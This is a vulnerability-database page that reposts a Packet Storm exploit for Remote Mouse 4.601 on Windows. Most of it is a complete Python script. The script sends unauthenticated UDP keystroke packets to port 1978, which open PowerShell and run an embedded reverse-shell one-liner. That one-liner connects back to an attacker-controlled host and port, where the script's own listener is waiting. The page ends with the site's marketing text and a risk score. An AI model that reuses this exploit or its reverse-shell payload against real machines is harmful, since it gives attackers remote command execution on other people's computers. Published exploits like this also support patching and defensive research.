Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Remote Mouse 4.601 Remote Command Execution

🗓️ 14 Jul 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm🔗 packetstorm.news👁 120 Views

Remote Mouse 4.601 remote code execution via unauthenticated UDP commands on port 1978 using PowerShell.

Code
# Exploit Title: Remote Mouse 4.601 - Remote Code Execution
    # Date: 14/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.remotemouse.net
    # Software Link: https://www.remotemouse.net/downloads
    # Version: 4.601 (Windows)
    # Tested on: Windows 10 / Windows 11
    # CVE: Pending
    
    '''
    Description:
    
    This exploit targets Remote Mouse 4.6.0.1 by injecting malicious UDP
    packets that simulate keyboard input to execute arbitrary PowerShell
    commands. The vulnerability exists in the way Remote Mouse processes
    unauthenticated UDP commands on port 1978. By sending specially crafted
    packets.
    '''
    
    import socket
    import time
    import threading
    
    TARGET_IP = "192.168.8.104"
    TARGET_PORT = 1978
    LHOST = "192.168.8.103"
    LPORT = 4444
    
    PS_REVERSE_SHELL = f"$c=New-Object
    Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))){{;$d=(New-Object
    Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o+='PS
    '+(pwd).Path+'>
    ';$s.Write(([text.encoding]::ASCII).GetBytes($o),0,$o.Length);$s.Flush()}};$c.Close()"
    
    def check_target():
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(3)
                s.connect((TARGET_IP, TARGET_PORT))
                data = s.recv(1024).decode().strip()
                return "nop 510" in data
        except:
            return False
    
    def send_udp(payload):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.sendto(payload.encode(), (TARGET_IP, TARGET_PORT))
    
    def exploit():
        if not check_target():
            print("[-] Target not vulnerable")
            return
    
        def listener():
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                s.bind((LHOST, LPORT))
                s.listen(1)
                conn, addr = s.accept()
                conn.sendall(b'\r\n')
                while True:
                    response = conn.recv(8192).decode(errors='ignore')
                    if not response: break
                    print(response, end='')
                    cmd = input()
                    if cmd.lower() == 'exit': break
                    conn.sendall(cmd.encode() + b'\r\n')
                conn.close()
    
        threading.Thread(target=listener, daemon=True).start()
        time.sleep(1)
    
        for cmd, delay in
    [("win",0.5),("[noe]powershell",1),("\r",2.5),(f"[noe]{PS_REVERSE_SHELL}",0.5),("\r",0)]:
            send_udp(f"key{len(cmd):03d}{cmd}")
            time.sleep(delay)
    
        print("[+] Exploit completed. Waiting for shell...")
        while True: time.sleep(1)
    
    if __name__ == "__main__":
        exploit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Jul 2025 00:00Current
8.3High risk
Vulners AI Score8.3
Remote MouseRemote code executionUser Datagram ProtocolPort 1978PowerShellReverse shell
120